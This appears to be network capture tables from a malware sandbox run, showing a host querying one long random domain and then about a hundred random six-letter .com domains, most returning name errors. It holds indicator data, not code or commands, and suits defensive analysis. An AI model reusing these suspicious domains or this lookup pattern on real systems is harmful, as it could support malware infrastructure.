Jul 20, 2022 19:40:36.404547930 CEST | 80 | 49729 | 104.16.173.80 | 192.168.2.7
Jul 20, 2022 19:40:36.405972004 CEST | 49729 | 80 | 192.168.2.7 | 104.16.173.80
Jul 20, 2022 19:40:36.408190966 CEST | 49729 | 80 | 192.168.2.7 | 104.16.173.80
Jul 20, 2022 19:40:36.427099943 CEST | 80 | 49729 | 104.16.173.80 | 192.168.2.7
Jul 20, 2022 19:40:36.627805948 CEST | 80 | 49729 | 104.16.173.80 | 192.168.2.7
Jul 20, 2022 19:40:36.628382921 CEST | 49729 | 80 | 192.168.2.7 | 104.16.173.80
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 20, 2022 19:38:14.102838039 CEST | 57859 | 53 | 192.168.2.7 | 8.8.8.8
Jul 20, 2022 19:38:14.126581907 CEST | 53 | 57859 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:40:36.279977083 CEST | 60996 | 53 | 192.168.2.7 | 8.8.8.8
Jul 20, 2022 19:40:36.303530931 CEST | 53 | 60996 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:08.202572107 CEST | 53 | 60280 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:08.301064968 CEST | 53 | 54143 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:08.374860048 CEST | 53 | 63377 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:09.083990097 CEST | 53 | 62353 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:09.165765047 CEST | 53 | 64618 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:09.199461937 CEST | 53 | 60412 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:09.284782887 CEST | 53 | 52480 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:09.324182034 CEST | 53 | 54177 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:09.389641047 CEST | 53 | 59475 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:09.483437061 CEST | 53 | 64980 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:09.520129919 CEST | 53 | 58846 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:09.595463991 CEST | 53 | 52971 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:09.633013964 CEST | 53 | 50125 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:10.979248047 CEST | 53 | 59856 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:11.046283007 CEST | 53 | 51824 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:11.159229040 CEST | 53 | 65214 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:11.251528978 CEST | 53 | 55245 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:11.384242058 CEST | 53 | 62843 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:11.486620903 CEST | 53 | 50560 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:11.536740065 CEST | 53 | 58657 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:11.566907883 CEST | 53 | 59946 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:11.604803085 CEST | 53 | 60920 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:11.638886929 CEST | 53 | 51160 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:11.669434071 CEST | 53 | 51488 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:11.700357914 CEST | 53 | 64495 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:11.729897022 CEST | 53 | 59445 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:11.778279066 CEST | 53 | 54509 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:31.907274008 CEST | 53 | 53358 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:31.938746929 CEST | 53 | 63201 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:31.981983900 CEST | 53 | 49815 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:32.018126011 CEST | 53 | 65250 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:32.051223040 CEST | 53 | 49495 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:32.082443953 CEST | 53 | 50915 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:32.115998030 CEST | 53 | 51073 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:32.145881891 CEST | 53 | 49999 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:32.176541090 CEST | 53 | 59874 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:32.206810951 CEST | 53 | 49182 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:32.241542101 CEST | 53 | 51889 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:32.350869894 CEST | 53 | 62711 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:32.379601955 CEST | 53 | 53907 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:32.411204100 CEST | 53 | 60721 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:32.454534054 CEST | 53 | 63852 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:32.483059883 CEST | 53 | 54621 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:32.593996048 CEST | 53 | 49170 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:32.630357027 CEST | 53 | 62837 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:32.660556078 CEST | 53 | 61988 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:32.695116043 CEST | 53 | 56758 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:32.732392073 CEST | 53 | 62381 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:32.767417908 CEST | 53 | 65258 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:32.798933983 CEST | 53 | 62685 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:32.835172892 CEST | 53 | 49527 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:32.871599913 CEST | 53 | 50426 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:32.899350882 CEST | 53 | 51516 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:32.929575920 CEST | 53 | 53953 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:32.959914923 CEST | 53 | 54735 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:33.007523060 CEST | 53 | 58883 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:33.035850048 CEST | 53 | 64521 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:33.065943003 CEST | 53 | 58097 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:33.100944042 CEST | 53 | 49198 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:33.140516996 CEST | 53 | 59489 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:33.172588110 CEST | 53 | 53897 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:33.210629940 CEST | 53 | 56432 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:33.267978907 CEST | 53 | 53086 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:33.305315018 CEST | 53 | 57138 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:33.343621969 CEST | 53 | 58882 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:33.380621910 CEST | 53 | 63380 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:33.410552025 CEST | 53 | 58226 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:33.446264029 CEST | 53 | 60433 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:33.476286888 CEST | 53 | 58761 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:33.525625944 CEST | 53 | 51533 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:33.561858892 CEST | 53 | 58136 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:33.596668959 CEST | 53 | 50871 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:33.625464916 CEST | 53 | 58613 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:33.661581993 CEST | 53 | 58791 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:33.692193985 CEST | 53 | 59443 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:33.723222971 CEST | 53 | 60082 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:34.769823074 CEST | 53 | 49173 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:34.805844069 CEST | 53 | 58033 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:35.848975897 CEST | 53 | 50892 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:35.879961014 CEST | 53 | 58660 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:35.910624981 CEST | 53 | 62472 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:35.945548058 CEST | 53 | 55780 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:35.979069948 CEST | 53 | 64739 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:36.008625984 CEST | 53 | 58253 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:36.039429903 CEST | 53 | 52269 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:36.073383093 CEST | 53 | 55402 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:36.106430054 CEST | 53 | 60152 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:36.142524958 CEST | 53 | 50399 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:36.253673077 CEST | 53 | 63982 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:36.283185005 CEST | 53 | 58956 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:36.315047979 CEST | 53 | 55134 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:36.345887899 CEST | 53 | 63391 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:36.376631975 CEST | 53 | 52741 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:36.407152891 CEST | 53 | 55428 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:36.437306881 CEST | 53 | 64088 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:36.486955881 CEST | 53 | 59788 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:37.532622099 CEST | 53 | 60576 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:37.572000980 CEST | 53 | 57704 | 8.8.8.8 | 192.168.2.7
Jul 20, 2022 19:41:37.602675915 CEST | 53 | 55887 | 8.8.8.8 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 20, 2022 19:38:14.102838039 CEST | 192.168.2.7 | 8.8.8.8 | 0xda4 | Standard query (0) | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | A (IP address) | IN (0x0001)
Jul 20, 2022 19:40:36.279977083 CEST | 192.168.2.7 | 8.8.8.8 | 0x42f7 | Standard query (0) | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | A (IP address) | IN (0x0001)
                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                  Jul 20, 2022 19:38:14.126581907 CEST | 8.8.8.8 | 192.168.2.7 | 0xda4 | No error (0) | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | | 104.16.173.80 | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:38:14.126581907 CEST | 8.8.8.8 | 192.168.2.7 | 0xda4 | No error (0) | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | | 104.17.244.81 | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:40:36.303530931 CEST | 8.8.8.8 | 192.168.2.7 | 0x42f7 | No error (0) | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | | 104.16.173.80 | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:40:36.303530931 CEST | 8.8.8.8 | 192.168.2.7 | 0x42f7 | No error (0) | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | | 104.17.244.81 | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:08.202572107 CEST | 8.8.8.8 | 192.168.2.7 | 0x673c | Name error (3) | tlmowf.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:08.301064968 CEST | 8.8.8.8 | 192.168.2.7 | 0xc0b2 | Name error (3) | lyeaew.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:08.374860048 CEST | 8.8.8.8 | 192.168.2.7 | 0xfc5 | Name error (3) | kqurib.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:09.083990097 CEST | 8.8.8.8 | 192.168.2.7 | 0x1d9e | Name error (3) | pqjxkf.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:09.165765047 CEST | 8.8.8.8 | 192.168.2.7 | 0x2a89 | Name error (3) | omxsxm.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:09.199461937 CEST | 8.8.8.8 | 192.168.2.7 | 0xb170 | Name error (3) | yurwei.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:09.284782887 CEST | 8.8.8.8 | 192.168.2.7 | 0x1756 | Name error (3) | vpqnxj.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:09.324182034 CEST | 8.8.8.8 | 192.168.2.7 | 0x4ab9 | Name error (3) | cxfuoy.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:09.389641047 CEST | 8.8.8.8 | 192.168.2.7 | 0xbab8 | Name error (3) | iuwutz.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:09.483437061 CEST | 8.8.8.8 | 192.168.2.7 | 0xc036 | Name error (3) | iodilu.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:09.520129919 CEST | 8.8.8.8 | 192.168.2.7 | 0x477f | Name error (3) | eekkiz.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:09.595463991 CEST | 8.8.8.8 | 192.168.2.7 | 0x9878 | Name error (3) | asesdh.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:09.633013964 CEST | 8.8.8.8 | 192.168.2.7 | 0x5af1 | Name error (3) | ebalrg.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:10.979248047 CEST | 8.8.8.8 | 192.168.2.7 | 0xf828 | Name error (3) | gfjioe.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:11.046283007 CEST | 8.8.8.8 | 192.168.2.7 | 0x1be0 | Name error (3) | emjlon.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:11.159229040 CEST | 8.8.8.8 | 192.168.2.7 | 0xe973 | Name error (3) | osbytn.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:11.251528978 CEST | 8.8.8.8 | 192.168.2.7 | 0x182e | Name error (3) | syeyep.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:11.384242058 CEST | 8.8.8.8 | 192.168.2.7 | 0x7059 | Name error (3) | faepoi.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:11.486620903 CEST | 8.8.8.8 | 192.168.2.7 | 0x81d3 | Name error (3) | yzeofb.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:11.536740065 CEST | 8.8.8.8 | 192.168.2.7 | 0xed6b | Name error (3) | iqhufw.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:11.566907883 CEST | 8.8.8.8 | 192.168.2.7 | 0x4df5 | Name error (3) | rdtvdr.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:11.604803085 CEST | 8.8.8.8 | 192.168.2.7 | 0x736d | Name error (3) | duomeu.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:11.638886929 CEST | 8.8.8.8 | 192.168.2.7 | 0xf4f2 | Name error (3) | vuhaba.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:11.669434071 CEST | 8.8.8.8 | 192.168.2.7 | 0x817f | Name error (3) | xinoyg.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:11.700357914 CEST | 8.8.8.8 | 192.168.2.7 | 0x9c6a | Name error (3) | ikgcbn.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:11.729897022 CEST | 8.8.8.8 | 192.168.2.7 | 0x1125 | Name error (3) | iyvsrd.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:11.778279066 CEST | 8.8.8.8 | 192.168.2.7 | 0x5ebd | Name error (3) | zmquum.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:31.907274008 CEST | 8.8.8.8 | 192.168.2.7 | 0xd714 | Name error (3) | wabuqy.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:31.938746929 CEST | 8.8.8.8 | 192.168.2.7 | 0xc175 | Name error (3) | bxoqpu.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:31.981983900 CEST | 8.8.8.8 | 192.168.2.7 | 0x65d0 | Name error (3) | onmwqv.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:32.018126011 CEST | 8.8.8.8 | 192.168.2.7 | 0x64ec | Name error (3) | kyivtg.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:32.051223040 CEST | 8.8.8.8 | 192.168.2.7 | 0xa449 | Name error (3) | yuayzn.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:32.082443953 CEST | 8.8.8.8 | 192.168.2.7 | 0xc8e | Name error (3) | zaobbc.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:32.115998030 CEST | 8.8.8.8 | 192.168.2.7 | 0x5e59 | Name error (3) | zsljps.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:32.145881891 CEST | 8.8.8.8 | 192.168.2.7 | 0x51cf | Name error (3) | oktbec.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:32.176541090 CEST | 8.8.8.8 | 192.168.2.7 | 0x98e | Name error (3) | ocxepi.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:32.206810951 CEST | 8.8.8.8 | 192.168.2.7 | 0x206f | Name error (3) | nbfpvs.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:32.241542101 CEST | 8.8.8.8 | 192.168.2.7 | 0xc7fb | Name error (3) | igeeyv.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:32.350869894 CEST | 8.8.8.8 | 192.168.2.7 | 0xc178 | Name error (3) | yraxyh.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:32.379601955 CEST | 8.8.8.8 | 192.168.2.7 | 0x9a69 | Name error (3) | pombmi.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:32.411204100 CEST | 8.8.8.8 | 192.168.2.7 | 0x87ff | Name error (3) | ajiunz.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:32.454534054 CEST | 8.8.8.8 | 192.168.2.7 | 0xaca | Name error (3) | oeyeob.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:32.483059883 CEST | 8.8.8.8 | 192.168.2.7 | 0xc65c | Name error (3) | mupjvv.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:32.593996048 CEST | 8.8.8.8 | 192.168.2.7 | 0xec52 | Name error (3) | lovzje.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:32.630357027 CEST | 8.8.8.8 | 192.168.2.7 | 0x3b2b | Name error (3) | vurdyj.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:32.660556078 CEST | 8.8.8.8 | 192.168.2.7 | 0x4793 | Name error (3) | zynrye.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:32.695116043 CEST | 8.8.8.8 | 192.168.2.7 | 0xf6b | Name error (3) | lyyppo.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:32.732392073 CEST | 8.8.8.8 | 192.168.2.7 | 0xba60 | Name error (3) | ayxohj.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:32.767417908 CEST | 8.8.8.8 | 192.168.2.7 | 0x6134 | Name error (3) | ibmzei.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:32.798933983 CEST | 8.8.8.8 | 192.168.2.7 | 0x58bd | Name error (3) | ouyghe.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:32.835172892 CEST | 8.8.8.8 | 192.168.2.7 | 0x1b19 | Name error (3) | mipimr.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:32.871599913 CEST | 8.8.8.8 | 192.168.2.7 | 0x20f1 | Name error (3) | gefpqv.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:32.899350882 CEST | 8.8.8.8 | 192.168.2.7 | 0xb157 | Name error (3) | ovgvxa.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:32.929575920 CEST | 8.8.8.8 | 192.168.2.7 | 0x9dc8 | Name error (3) | eaqmly.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:32.959914923 CEST | 8.8.8.8 | 192.168.2.7 | 0xd9a0 | Name error (3) | aantza.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:33.007523060 CEST | 8.8.8.8 | 192.168.2.7 | 0x7d6 | Name error (3) | ypfefo.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:33.035850048 CEST | 8.8.8.8 | 192.168.2.7 | 0x7578 | Name error (3) | ttviky.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:33.065943003 CEST | 8.8.8.8 | 192.168.2.7 | 0x4741 | Name error (3) | eaqtlo.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:33.100944042 CEST | 8.8.8.8 | 192.168.2.7 | 0x4a0c | Name error (3) | eyakeo.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:33.140516996 CEST | 8.8.8.8 | 192.168.2.7 | 0x79f8 | Name error (3) | uhcquu.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:33.172588110 CEST | 8.8.8.8 | 192.168.2.7 | 0xd0f3 | Name error (3) | ibhjiz.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:33.210629940 CEST | 8.8.8.8 | 192.168.2.7 | 0x5187 | Name error (3) | ldyouw.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:33.305315018 CEST | 8.8.8.8 | 192.168.2.7 | 0x879d | Name error (3) | exjeos.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:33.343621969 CEST | 8.8.8.8 | 192.168.2.7 | 0xfb4e | Name error (3) | xaatge.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:33.380621910 CEST | 8.8.8.8 | 192.168.2.7 | 0xf51f | Name error (3) | sjotuu.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:33.410552025 CEST | 8.8.8.8 | 192.168.2.7 | 0x9bff | Name error (3) | jiqvfz.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:33.446264029 CEST | 8.8.8.8 | 192.168.2.7 | 0x4b52 | Name error (3) | nbjvkj.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:33.476286888 CEST | 8.8.8.8 | 192.168.2.7 | 0x8808 | Name error (3) | bnkmik.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:33.525625944 CEST | 8.8.8.8 | 192.168.2.7 | 0x75a | Name error (3) | loozpo.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:33.561858892 CEST | 8.8.8.8 | 192.168.2.7 | 0xe138 | Name error (3) | peyuye.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:33.596668959 CEST | 8.8.8.8 | 192.168.2.7 | 0xd9e6 | Name error (3) | hhvuzb.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:33.625464916 CEST | 8.8.8.8 | 192.168.2.7 | 0x6964 | Name error (3) | eayzaw.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:33.661581993 CEST | 8.8.8.8 | 192.168.2.7 | 0x2b79 | Name error (3) | ogggyz.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:33.692193985 CEST | 8.8.8.8 | 192.168.2.7 | 0x5c3 | Name error (3) | jzeiry.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:33.723222971 CEST | 8.8.8.8 | 192.168.2.7 | 0xa37b | Name error (3) | flcdqa.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:34.769823074 CEST | 8.8.8.8 | 192.168.2.7 | 0x778e | Name error (3) | ybeujn.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:34.805844069 CEST | 8.8.8.8 | 192.168.2.7 | 0x51c5 | Name error (3) | cqofos.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:35.848975897 CEST | 8.8.8.8 | 192.168.2.7 | 0x4977 | Name error (3) | teasgj.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:35.879961014 CEST | 8.8.8.8 | 192.168.2.7 | 0x52b9 | Name error (3) | hpqelp.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:35.910624981 CEST | 8.8.8.8 | 192.168.2.7 | 0x33fb | Name error (3) | mdrnku.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:35.945548058 CEST | 8.8.8.8 | 192.168.2.7 | 0xcdc1 | Name error (3) | pxbypa.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:35.979069948 CEST | 8.8.8.8 | 192.168.2.7 | 0x1f41 | Name error (3) | rjajzc.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:36.008625984 CEST | 8.8.8.8 | 192.168.2.7 | 0xe375 | Name error (3) | cododi.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:36.039429903 CEST | 8.8.8.8 | 192.168.2.7 | 0xd4c8 | Name error (3) | nuzyfp.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:36.073383093 CEST | 8.8.8.8 | 192.168.2.7 | 0x4ae9 | Name error (3) | txaoos.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:36.106430054 CEST | 8.8.8.8 | 192.168.2.7 | 0x2ba1 | Name error (3) | mrbfyf.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:36.142524958 CEST | 8.8.8.8 | 192.168.2.7 | 0x32bd | Name error (3) | atiajo.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:36.253673077 CEST | 8.8.8.8 | 192.168.2.7 | 0x78f2 | Name error (3) | yzwoea.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:36.283185005 CEST | 8.8.8.8 | 192.168.2.7 | 0x6e81 | Name error (3) | pvyeyr.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:36.315047979 CEST | 8.8.8.8 | 192.168.2.7 | 0x1caf | Name error (3) | ueercj.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:36.345887899 CEST | 8.8.8.8 | 192.168.2.7 | 0x1431 | Name error (3) | yivanc.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:36.376631975 CEST | 8.8.8.8 | 192.168.2.7 | 0x5197 | Name error (3) | hyevqm.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:36.407152891 CEST | 8.8.8.8 | 192.168.2.7 | 0xa394 | Name error (3) | jrkbyt.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:36.437306881 CEST | 8.8.8.8 | 192.168.2.7 | 0x92a5 | Name error (3) | wyksye.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:36.486955881 CEST | 8.8.8.8 | 192.168.2.7 | 0x78a5 | Name error (3) | oonymf.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:37.532622099 CEST | 8.8.8.8 | 192.168.2.7 | 0x7cd7 | Name error (3) | uqghqa.com | none | none | A (IP address) | IN (0x0001)
